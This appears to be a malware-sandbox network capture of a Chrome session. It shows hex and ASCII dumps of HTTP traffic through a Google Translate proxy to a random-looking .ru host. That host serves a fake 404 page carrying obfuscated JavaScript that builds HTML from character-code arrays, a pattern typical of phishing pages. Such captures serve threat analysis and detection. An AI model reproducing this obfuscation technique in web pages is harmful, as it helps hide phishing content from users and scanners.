                                                                                                                                                                                    2024-01-26 13:41:24 UTC7879INData Raw: 31 65 39 38 0d 0a 76 61 72 20 65 72 70 20 3d 20 6e 65 77 20 41 72 72 61 79 3b 0a 65 72 70 5b 30 5d 20 3d 20 36 30 3b 0a 65 72 70 5b 31 5d 20 3d 20 31 30 34 3b 0a 65 72 70 5b 32 5d 20 3d 20 31 30 31 3b 0a 65 72 70 5b 33 5d 20 3d 20 39 37 3b 0a 65 72 70 5b 34 5d 20 3d 20 31 30 30 3b 0a 65 72 70 5b 35 5d 20 3d 20 36 32 3b 0a 65 72 70 5b 36 5d 20 3d 20 36 30 3b 0a 65 72 70 5b 37 5d 20 3d 20 31 30 39 3b 0a 65 72 70 5b 38 5d 20 3d 20 31 30 31 3b 0a 65 72 70 5b 39 5d 20 3d 20 31 31 36 3b 0a 65 72 70 5b 31 30 5d 20 3d 20 39 37 3b 0a 65 72 70 5b 31 31 5d 20 3d 20 33 32 3b 0a 65 72 70 5b 31 32 5d 20 3d 20 31 30 34 3b 0a 65 72 70 5b 31 33 5d 20 3d 20 31 31 36 3b 0a 65 72 70 5b 31 34 5d 20 3d 20 31 31 36 3b 0a 65 72 70 5b 31 35 5d 20 3d 20 31 31 32 3b 0a 65 72 70 5b
                                                                                                                                                                                    Data Ascii: 1e98var erp = new Array;erp[0] = 60;erp[1] = 104;erp[2] = 101;erp[3] = 97;erp[4] = 100;erp[5] = 62;erp[6] = 60;erp[7] = 109;erp[8] = 101;erp[9] = 116;erp[10] = 97;erp[11] = 32;erp[12] = 104;erp[13] = 116;erp[14] = 116;erp[15] = 112;erp[
                                                                                                                                                                                    2024-01-26 13:41:24 UTC8159INData Raw: 0a 65 72 70 5b 35 31 36 5d 20 3d 20 38 38 3b 0a 65 72 70 5b 35 31 37 5d 20 3d 20 38 32 3b 0a 65 72 70 5b 35 31 38 5d 20 3d 20 31 31 32 3b 0a 65 72 70 5b 35 31 39 5d 20 3d 20 39 38 3b 0a 65 72 70 5b 35 32 30 5d 20 3d 20 35 30 3b 0a 65 72 70 5b 35 32 31 5d 20 3d 20 35 32 3b 0a 65 72 70 5b 35 32 32 5d 20 3d 20 35 34 3b 0a 65 72 70 5b 35 32 33 5d 20 3d 20 38 39 3b 0a 65 72 70 5b 35 32 34 5d 20 3d 20 38 37 3b 0a 65 72 70 5b 35 32 35 5d 20 3d 20 37 34 3b 0a 65 72 70 5b 35 32 36 5d 20 3d 20 31 32 32 3b 0a 65 72 70 5b 35 32 37 5d 20 3d 20 39 38 3b 0a 65 72 70 5b 35 32 38 5d 20 3d 20 35 30 3b 0a 65 72 70 5b 35 32 39 5d 20 3d 20 31 32 30 3b 0a 65 72 70 5b 35 33 30 5d 20 3d 20 34 39 3b 0a 65 72 70 5b 35 33 31 5d 20 3d 20 31 30 30 3b 0a 65 72 70 5b 35 33 32 5d 20 3d
                                                                                                                                                                                    Data Ascii: erp[516] = 88;erp[517] = 82;erp[518] = 112;erp[519] = 98;erp[520] = 50;erp[521] = 52;erp[522] = 54;erp[523] = 89;erp[524] = 87;erp[525] = 74;erp[526] = 122;erp[527] = 98;erp[528] = 50;erp[529] = 120;erp[530] = 49;erp[531] = 100;erp[532] =
                                                                                                                                                                                    2024-01-26 13:41:24 UTC2INData Raw: 0d 0a
                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                    2024-01-26 13:41:24 UTC8192INData Raw: 32 30 30 30 0d 0a 20 3d 20 39 30 3b 0a 65 72 70 5b 31 30 34 34 5d 20 3d 20 37 31 3b 0a 65 72 70 5b 31 30 34 35 5d 20 3d 20 31 30 38 3b 0a 65 72 70 5b 31 30 34 36 5d 20 3d 20 35 30 3b 0a 65 72 70 5b 31 30 34 37 5d 20 3d 20 37 39 3b 0a 65 72 70 5b 31 30 34 38 5d 20 3d 20 31 30 39 3b 0a 65 72 70 5b 31 30 34 39 5d 20 3d 20 35 33 3b 0a 65 72 70 5b 31 30 35 30 5d 20 3d 20 34 38 3b 0a 65 72 70 5b 31 30 35 31 5d 20 3d 20 39 37 3b 0a 65 72 70 5b 31 30 35 32 5d 20 3d 20 36 37 3b 0a 65 72 70 5b 31 30 35 33 5d 20 3d 20 34 39 3b 0a 65 72 70 5b 31 30 35 34 5d 20 3d 20 31 30 36 3b 0a 65 72 70 5b 31 30 35 35 5d 20 3d 20 39 37 3b 0a 65 72 70 5b 31 30 35 36 5d 20 3d 20 37 31 3b 0a 65 72 70 5b 31 30 35 37 5d 20 3d 20 31 30 38 3b 0a 65 72 70 5b 31 30 35 38 5d 20 3d 20 31 31
                                                                                                                                                                                    Data Ascii: 2000 = 90;erp[1044] = 71;erp[1045] = 108;erp[1046] = 50;erp[1047] = 79;erp[1048] = 109;erp[1049] = 53;erp[1050] = 48;erp[1051] = 97;erp[1052] = 67;erp[1053] = 49;erp[1054] = 106;erp[1055] = 97;erp[1056] = 71;erp[1057] = 108;erp[1058] = 11
                                                                                                                                                                                    2024-01-26 13:41:24 UTC6INData Raw: 65 72 70 5b 31 35
                                                                                                                                                                                    Data Ascii: erp[15
                                                                                                                                                                                    2024-01-26 13:41:24 UTC2INData Raw: 0d 0a
                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                    2024-01-26 13:41:24 UTC8192INData Raw: 32 30 30 30 0d 0a 34 34 5d 20 3d 20 37 32 3b 0a 65 72 70 5b 31 35 34 35 5d 20 3d 20 36 36 3b 0a 65 72 70 5b 31 35 34 36 5d 20 3d 20 35 32 3b 0a 65 72 70 5b 31 35 34 37 5d 20 3d 20 37 39 3b 0a 65 72 70 5b 31 35 34 38 5d 20 3d 20 35 30 3b 0a 65 72 70 5b 31 35 34 39 5d 20 3d 20 31 32 30 3b 0a 65 72 70 5b 31 35 35 30 5d 20 3d 20 31 30 38 3b 0a 65 72 70 5b 31 35 35 31 5d 20 3d 20 39 30 3b 0a 65 72 70 5b 31 35 35 32 5d 20 3d 20 31 31 30 3b 0a 65 72 70 5b 31 35 35 33 5d 20 3d 20 38 31 3b 0a 65 72 70 5b 31 35 35 34 5d 20 3d 20 35 34 3b 0a 65 72 70 5b 31 35 35 35 5d 20 3d 20 37 37 3b 0a 65 72 70 5b 31 35 35 36 5d 20 3d 20 31 30 36 3b 0a 65 72 70 5b 31 35 35 37 5d 20 3d 20 38 32 3b 0a 65 72 70 5b 31 35 35 38 5d 20 3d 20 31 31 39 3b 0a 65 72 70 5b 31 35 35 39 5d 20
                                                                                                                                                                                    Data Ascii: 200044] = 72;erp[1545] = 66;erp[1546] = 52;erp[1547] = 79;erp[1548] = 50;erp[1549] = 120;erp[1550] = 108;erp[1551] = 90;erp[1552] = 110;erp[1553] = 81;erp[1554] = 54;erp[1555] = 77;erp[1556] = 106;erp[1557] = 82;erp[1558] = 119;erp[1559]
                                                                                                                                                                                    2024-01-26 13:41:24 UTC6INData Raw: 3d 20 37 31 3b 0a
                                                                                                                                                                                    Data Ascii: = 71;
                                                                                                                                                                                    2024-01-26 13:41:24 UTC2INData Raw: 0d 0a
                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                    2024-01-26 13:41:24 UTC8192INData Raw: 32 30 30 30 0d 0a 65 72 70 5b 32 30 34 35 5d 20 3d 20 35 37 3b 0a 65 72 70 5b 32 30 34 36 5d 20 3d 20 31 31 39 3b 0a 65 72 70 5b 32 30 34 37 5d 20 3d 20 37 39 3b 0a 65 72 70 5b 32 30 34 38 5d 20 3d 20 31 30 35 3b 0a 65 72 70 5b 32 30 34 39 5d 20 3d 20 36 35 3b 0a 65 72 70 5b 32 30 35 30 5d 20 3d 20 34 39 3b 0a 65 72 70 5b 32 30 35 31 5d 20 3d 20 37 37 3b 0a 65 72 70 5b 32 30 35 32 5d 20 3d 20 36 37 3b 0a 65 72 70 5b 32 30 35 33 5d 20 3d 20 38 35 3b 0a 65 72 70 5b 32 30 35 34 5d 20 3d 20 35 35 3b 0a 65 72 70 5b 32 30 35 35 5d 20 3d 20 37 33 3b 0a 65 72 70 5b 32 30 35 36 5d 20 3d 20 36 37 3b 0a 65 72 70 5b 32 30 35 37 5d 20 3d 20 34 39 3b 0a 65 72 70 5b 32 30 35 38 5d 20 3d 20 35 31 3b 0a 65 72 70 5b 32 30 35 39 5d 20 3d 20 39 30 3b 0a 65 72 70 5b 32 30 36
                                                                                                                                                                                    Data Ascii: 2000erp[2045] = 57;erp[2046] = 119;erp[2047] = 79;erp[2048] = 105;erp[2049] = 65;erp[2050] = 49;erp[2051] = 77;erp[2052] = 67;erp[2053] = 85;erp[2054] = 55;erp[2055] = 73;erp[2056] = 67;erp[2057] = 49;erp[2058] = 51;erp[2059] = 90;erp[206


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    4192.168.2.1649723172.217.215.1324436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-01-26 13:41:25 UTC601OUTGET /logos/0028/7193/logox_0.png?ZBulnusKdtgyimF HTTP/1.1
                                                                                                                                                                                    Host: cascade-madmimi-com.translate.goog
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                    2024-01-26 13:41:25 UTC462INHTTP/1.1 200 OK
                                                                                                                                                                                    Last-Modified: Sat, 02 Sep 2023 10:34:50 GMT
                                                                                                                                                                                    x-robots-tag: none
                                                                                                                                                                                    Content-Security-Policy: frame-ancestors *.translate.goog
                                                                                                                                                                                    Content-Type: image/png
                                                                                                                                                                                    Cross-Origin-Opener-Policy: unsafe-none
                                                                                                                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Date: Fri, 26 Jan 2024 13:41:25 GMT
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2024-01-26 13:41:25 UTC790INData Raw: 64 30 33 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 e2 00 00 00 30 08 06 00 00 00 0c e6 a6 f3 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 0c bd 49 44 41 54 78 01 ed 9c 3d 77 1b b9 15 86 47 b6 7a d3 bf c0 4c ca 34 66 4e d2 6b 5c 64 53 9a ee b3 c7 a3 5f 60 fa ab 8d a8 da 1f d2 fe 02 8f 72 d2 9b ee b2 95 c9 7e cf 46 aa dc 65 a9 5f b0 52 5a 7f 30 cf 4b 03 5c 0c 06 43 42 12 87 de 8d 31 e7 8c 81 7b 71 71 2f e6 05 5e 7c 0c 47 de fa 6f ff f7 b3 ac 85 0b a7 3f de 18 fd e7 4f 72 fd f7 ef b3 1f b6 b6 b2 79 7e dd a1 f6 ff 92 5d cb b6 b2 56 9e 61 dd 6d 4d fe 12 02 4d 08 5c 6b 2a 48 fa 84 40 42 60 73 08 24 22 6e 0e eb 14 29 21 d0 88 40 22 62 23 34 a9 20 21 b0 39 04 12 11 37 87 75 8a 94 10 68 44 20 11 b1 11 9a 54 90 10 d8 1c 02 89 88 9b c3 3a 45 4a
                                                                                                                                                                                    Data Ascii: d03PNGIHDR0sRGBIDATx=wGzL4fNk\dS_`r~Fe_RZ0K\CB1{qq/^|Go?Ory~]VamMM\k*H@B`s$"n)!@"b#4 !97uhD T:EJ
                                                                                                                                                                                    2024-01-26 13:41:25 UTC1252INData Raw: 2e 1d b3 c6 2c 67 82 c2 9b 35 4f 31 1e 73 ef 34 56 32 05 da d2 f2 d2 66 b1 1a 4b 0d 89 4f 62 66 5c bd 89 a3 dd 3b d8 77 89 df a3 ea 7c e6 46 3e 46 3e 36 5f 7a 9c 99 50 f3 64 55 3c ff 77 56 56 fa a3 a6 ad b2 17 3f b7 71 88 3f 26 fe 94 f8 93 a6 ba d6 d6 4f d5 3e ea dd a5 fe c2 9f 6c e4 53 cf 75 70 70 f0 c6 af 13 92 35 39 e2 43 5f bf 08 17 e1 d3 95 9d c1 66 4a 9f 4d 9e 3d 7b 76 2c 9d 7f e9 b9 b0 bf e5 eb 5d 59 5f d6 b8 b2 9b a7 6e a5 3f 55 46 dc db d4 99 b9 76 3c cb 24 11 d1 41 44 83 85 15 70 02 80 2e b8 b9 3a 24 72 20 3d 70 dc 09 f4 43 e4 8e ab 6b ca 33 e8 0e 19 14 6e dc 8c 76 dc c1 7e dc 54 47 64 21 c6 1e e5 b9 6c b0 57 b2 b8 90 73 09 90 34 e3 b9 76 dd 8f 14 9a e2 f1 ac c7 d8 bf c6 6f ee fa db de de 9e e0 6a 2a 7f f6 ba 48 7c 7e 7f 1b 11 f3 e1 2a 1c 45 40
                                                                                                                                                                                    Data Ascii: .,g5O1s4V2fKObf\;w|F>F>6_zPdU<wVV?q?&O>lSupp59C_fJM={v,]Y_n?UFv<$ADp.:$r =pCk3nv~TGd!lWs4voj*H|~*E@
                                                                                                                                                                                    2024-01-26 13:41:25 UTC1252INData Raw: 26 45 9d e5 be 0b 9d af 8c 5d 8d 38 10 6c ac b2 55 97 48 8e ff 8a 19 b1 3a 15 45 cb 42 da 9a 2e 01 58 2f 6d fc 62 3a 77 60 75 81 ad 6a 2b 2f 69 14 8f 41 db b3 71 6d 8a 6e 6a f3 bf f5 54 64 e0 79 f6 97 3c 87 fe 94 e8 2d 84 79 6b de 8e 2e 31 fd 5c 14 b1 8a ba 3e 6a 6f 38 99 68 37 46 c6 44 44 b7 2b bc bc 19 1c 95 59 9f c1 a0 3f ee b4 1d b4 58 2d 55 95 b2 d2 73 f1 7f 23 f2 6c f6 99 5b 7b 26 b6 b9 43 e2 ec 12 a0 46 0a 27 68 ce 04 29 42 f6 1d dd 95 b3 c4 fd f9 ca 4e ae e0 20 11 71 35 78 a5 6b a2 2d 0b 2b a1 7e 6b 2a fc ed 0b ab 65 c5 d6 ad f7 5b cf f3 ac 67 9b 78 06 9d 39 21 5a 17 62 68 75 0c 12 52 b8 53 fe ca 99 10 83 4d 5b 55 ee 56 c2 67 d7 95 95 67 22 de c8 33 2b 56 22 a2 50 58 72 99 97 11 a7 ae 09 9d 76 5f b7 ab 63 60 5c f8 c3 66 b7 7e 44 7e 1a b0 c9 03 ba
                                                                                                                                                                                    Data Ascii: &E]8lUH:EB.X/mb:w`uj+/iAqmnjTdy<-yk.1\>jo8h7FDD+Y?X-Us#l[{&CF'h)BN q5xk-+~k*e[gx9!ZbhuRSM[UVgg"3+V"PXrv_c`\f~D~
                                                                                                                                                                                    2024-01-26 13:41:25 UTC44INData Raw: 11 31 1e ab 64 99 10 68 0d 81 44 c4 d6 a0 4d 8e 13 02 f1 08 fc 0f 40 05 c0 c7 40 dc ea 25 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a
                                                                                                                                                                                    Data Ascii: 1dhDM@@%IENDB`
                                                                                                                                                                                    2024-01-26 13:41:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    5192.168.2.1649725142.250.9.1324436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-01-26 13:41:26 UTC401OUTGET /logos/0028/7193/logox_0.png?ZBulnusKdtgyimF HTTP/1.1
                                                                                                                                                                                    Host: cascade-madmimi-com.translate.goog
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                    2024-01-26 13:41:26 UTC462INHTTP/1.1 200 OK
                                                                                                                                                                                    Last-Modified: Sat, 02 Sep 2023 10:34:50 GMT
                                                                                                                                                                                    x-robots-tag: none
                                                                                                                                                                                    Content-Security-Policy: frame-ancestors *.translate.goog
                                                                                                                                                                                    Content-Type: image/png
                                                                                                                                                                                    Cross-Origin-Opener-Policy: unsafe-none
                                                                                                                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Date: Fri, 26 Jan 2024 13:41:26 GMT
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2024-01-26 13:41:26 UTC790INData Raw: 64 30 33 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 e2 00 00 00 30 08 06 00 00 00 0c e6 a6 f3 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 0c bd 49 44 41 54 78 01 ed 9c 3d 77 1b b9 15 86 47 b6 7a d3 bf c0 4c ca 34 66 4e d2 6b 5c 64 53 9a ee b3 c7 a3 5f 60 fa ab 8d a8 da 1f d2 fe 02 8f 72 d2 9b ee b2 95 c9 7e cf 46 aa dc 65 a9 5f b0 52 5a 7f 30 cf 4b 03 5c 0c 06 43 42 12 87 de 8d 31 e7 8c 81 7b 71 71 2f e6 05 5e 7c 0c 47 de fa 6f ff f7 b3 ac 85 0b a7 3f de 18 fd e7 4f 72 fd f7 ef b3 1f b6 b6 b2 79 7e dd a1 f6 ff 92 5d cb b6 b2 56 9e 61 dd 6d 4d fe 12 02 4d 08 5c 6b 2a 48 fa 84 40 42 60 73 08 24 22 6e 0e eb 14 29 21 d0 88 40 22 62 23 34 a9 20 21 b0 39 04 12 11 37 87 75 8a 94 10 68 44 20 11 b1 11 9a 54 90 10 d8 1c 02 89 88 9b c3 3a 45 4a
                                                                                                                                                                                    Data Ascii: d03PNGIHDR0sRGBIDATx=wGzL4fNk\dS_`r~Fe_RZ0K\CB1{qq/^|Go?Ory~]VamMM\k*H@B`s$"n)!@"b#4 !97uhD T:EJ
                                                                                                                                                                                    2024-01-26 13:41:26 UTC1252INData Raw: 2e 1d b3 c6 2c 67 82 c2 9b 35 4f 31 1e 73 ef 34 56 32 05 da d2 f2 d2 66 b1 1a 4b 0d 89 4f 62 66 5c bd 89 a3 dd 3b d8 77 89 df a3 ea 7c e6 46 3e 46 3e 36 5f 7a 9c 99 50 f3 64 55 3c ff 77 56 56 fa a3 a6 ad b2 17 3f b7 71 88 3f 26 fe 94 f8 93 a6 ba d6 d6 4f d5 3e ea dd a5 fe c2 9f 6c e4 53 cf 75 70 70 f0 c6 af 13 92 35 39 e2 43 5f bf 08 17 e1 d3 95 9d c1 66 4a 9f 4d 9e 3d 7b 76 2c 9d 7f e9 b9 b0 bf e5 eb 5d 59 5f d6 b8 b2 9b a7 6e a5 3f 55 46 dc db d4 99 b9 76 3c cb 24 11 d1 41 44 83 85 15 70 02 80 2e b8 b9 3a 24 72 20 3d 70 dc 09 f4 43 e4 8e ab 6b ca 33 e8 0e 19 14 6e dc 8c 76 dc c1 7e dc 54 47 64 21 c6 1e e5 b9 6c b0 57 b2 b8 90 73 09 90 34 e3 b9 76 dd 8f 14 9a e2 f1 ac c7 d8 bf c6 6f ee fa db de de 9e e0 6a 2a 7f f6 ba 48 7c 7e 7f 1b 11 f3 e1 2a 1c 45 40
                                                                                                                                                                                    Data Ascii: .,g5O1s4V2fKObf\;w|F>F>6_zPdU<wVV?q?&O>lSupp59C_fJM={v,]Y_n?UFv<$ADp.:$r =pCk3nv~TGd!lWs4voj*H|~*E@
                                                                                                                                                                                    2024-01-26 13:41:26 UTC1252INData Raw: 26 45 9d e5 be 0b 9d af 8c 5d 8d 38 10 6c ac b2 55 97 48 8e ff 8a 19 b1 3a 15 45 cb 42 da 9a 2e 01 58 2f 6d fc 62 3a 77 60 75 81 ad 6a 2b 2f 69 14 8f 41 db b3 71 6d 8a 6e 6a f3 bf f5 54 64 e0 79 f6 97 3c 87 fe 94 e8 2d 84 79 6b de 8e 2e 31 fd 5c 14 b1 8a ba 3e 6a 6f 38 99 68 37 46 c6 44 44 b7 2b bc bc 19 1c 95 59 9f c1 a0 3f ee b4 1d b4 58 2d 55 95 b2 d2 73 f1 7f 23 f2 6c f6 99 5b 7b 26 b6 b9 43 e2 ec 12 a0 46 0a 27 68 ce 04 29 42 f6 1d dd 95 b3 c4 fd f9 ca 4e ae e0 20 11 71 35 78 a5 6b a2 2d 0b 2b a1 7e 6b 2a fc ed 0b ab 65 c5 d6 ad f7 5b cf f3 ac 67 9b 78 06 9d 39 21 5a 17 62 68 75 0c 12 52 b8 53 fe ca 99 10 83 4d 5b 55 ee 56 c2 67 d7 95 95 67 22 de c8 33 2b 56 22 a2 50 58 72 99 97 11 a7 ae 09 9d 76 5f b7 ab 63 60 5c f8 c3 66 b7 7e 44 7e 1a b0 c9 03 ba
                                                                                                                                                                                    Data Ascii: &E]8lUH:EB.X/mb:w`uj+/iAqmnjTdy<-yk.1\>jo8h7FDD+Y?X-Us#l[{&CF'h)BN q5xk-+~k*e[gx9!ZbhuRSM[UVgg"3+V"PXrv_c`\f~D~
                                                                                                                                                                                    2024-01-26 13:41:26 UTC44INData Raw: 11 31 1e ab 64 99 10 68 0d 81 44 c4 d6 a0 4d 8e 13 02 f1 08 fc 0f 40 05 c0 c7 40 dc ea 25 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a
                                                                                                                                                                                    Data Ascii: 1dhDM@@%IENDB`
                                                                                                                                                                                    2024-01-26 13:41:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    6192.168.2.1649729104.21.79.94436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-01-26 13:41:28 UTC688OUTGET /hIdlMLOfWxySOTr9FfmxCijqf/ HTTP/1.1
                                                                                                                                                                                    Host: bggcwvekn3axi3ffz5ai.rvucouijw.ru
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                    Upgrade-Insecure-Requests: 1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                    Sec-Fetch-Mode: navigate
                                                                                                                                                                                    Sec-Fetch-Dest: document
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                    2024-01-26 13:41:28 UTC796INHTTP/1.1 404 Not Found
                                                                                                                                                                                    Date: Fri, 26 Jan 2024 13:41:28 GMT
                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    set-cookie: PHPSESSID=ls834djnk0rde6vlt948asvcmr; path=/
                                                                                                                                                                                    expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                    cache-control: no-store, no-cache, must-revalidate
                                                                                                                                                                                    pragma: no-cache
                                                                                                                                                                                    vary: Accept-Encoding
                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=x3TYwlaqsyOhwm2S9MZBAtjo4fPOvx4m1v39y%2FH8AGcQh6la3Zr%2BBsw1d2tnhxGnOhEclm9BX1Fj6pROtWkg8OpxCIGtAbcMnafyA4FSdPAL7pzaDAIYlcKWwRevy%2BbV78aJZ653j4vwfynH4f5vEhwVv9w%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                    CF-RAY: 84b92c737a2bb178-ATL
                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                    2024-01-26 13:41:28 UTC573INData Raw: 37 63 39 32 0d 0a 3c 73 63 72 69 70 74 3e 0a 76 61 72 20 5a 77 76 4f 67 4b 63 70 20 3d 20 6e 65 77 20 41 72 72 61 79 3b 0a 5a 77 76 4f 67 4b 63 70 5b 30 5d 20 3d 20 36 30 3b 0a 5a 77 76 4f 67 4b 63 70 5b 31 5d 20 3d 20 33 33 3b 0a 5a 77 76 4f 67 4b 63 70 5b 32 5d 20 3d 20 36 38 3b 0a 5a 77 76 4f 67 4b 63 70 5b 33 5d 20 3d 20 37 39 3b 0a 5a 77 76 4f 67 4b 63 70 5b 34 5d 20 3d 20 36 37 3b 0a 5a 77 76 4f 67 4b 63 70 5b 35 5d 20 3d 20 38 34 3b 0a 5a 77 76 4f 67 4b 63 70 5b 36 5d 20 3d 20 38 39 3b 0a 5a 77 76 4f 67 4b 63 70 5b 37 5d 20 3d 20 38 30 3b 0a 5a 77 76 4f 67 4b 63 70 5b 38 5d 20 3d 20 36 39 3b 0a 5a 77 76 4f 67 4b 63 70 5b 39 5d 20 3d 20 33 32 3b 0a 5a 77 76 4f 67 4b 63 70 5b 31 30 5d 20 3d 20 31 30 34 3b 0a 5a 77 76 4f 67 4b 63 70 5b 31 31 5d 20 3d
                                                                                                                                                                                    Data Ascii: 7c92<script>var ZwvOgKcp = new Array;ZwvOgKcp[0] = 60;ZwvOgKcp[1] = 33;ZwvOgKcp[2] = 68;ZwvOgKcp[3] = 79;ZwvOgKcp[4] = 67;ZwvOgKcp[5] = 84;ZwvOgKcp[6] = 89;ZwvOgKcp[7] = 80;ZwvOgKcp[8] = 69;ZwvOgKcp[9] = 32;ZwvOgKcp[10] = 104;ZwvOgKcp[11] =
                                                                                                                                                                                    2024-01-26 13:41:28 UTC1369INData Raw: 3b 0a 5a 77 76 4f 67 4b 63 70 5b 32 38 5d 20 3d 20 31 31 30 3b 0a 5a 77 76 4f 67 4b 63 70 5b 32 39 5d 20 3d 20 33 34 3b 0a 5a 77 76 4f 67 4b 63 70 5b 33 30 5d 20 3d 20 36 32 3b 0a 5a 77 76 4f 67 4b 63 70 5b 33 31 5d 20 3d 20 36 30 3b 0a 5a 77 76 4f 67 4b 63 70 5b 33 32 5d 20 3d 20 31 30 34 3b 0a 5a 77 76 4f 67 4b 63 70 5b 33 33 5d 20 3d 20 31 30 31 3b 0a 5a 77 76 4f 67 4b 63 70 5b 33 34 5d 20 3d 20 39 37 3b 0a 5a 77 76 4f 67 4b 63 70 5b 33 35 5d 20 3d 20 31 30 30 3b 0a 5a 77 76 4f 67 4b 63 70 5b 33 36 5d 20 3d 20 36 32 3b 0a 5a 77 76 4f 67 4b 63 70 5b 33 37 5d 20 3d 20 36 30 3b 0a 5a 77 76 4f 67 4b 63 70 5b 33 38 5d 20 3d 20 31 31 36 3b 0a 5a 77 76 4f 67 4b 63 70 5b 33 39 5d 20 3d 20 31 30 35 3b 0a 5a 77 76 4f 67 4b 63 70 5b 34 30 5d 20 3d 20 31 31 36 3b
                                                                                                                                                                                    Data Ascii: ;ZwvOgKcp[28] = 110;ZwvOgKcp[29] = 34;ZwvOgKcp[30] = 62;ZwvOgKcp[31] = 60;ZwvOgKcp[32] = 104;ZwvOgKcp[33] = 101;ZwvOgKcp[34] = 97;ZwvOgKcp[35] = 100;ZwvOgKcp[36] = 62;ZwvOgKcp[37] = 60;ZwvOgKcp[38] = 116;ZwvOgKcp[39] = 105;ZwvOgKcp[40] = 116;
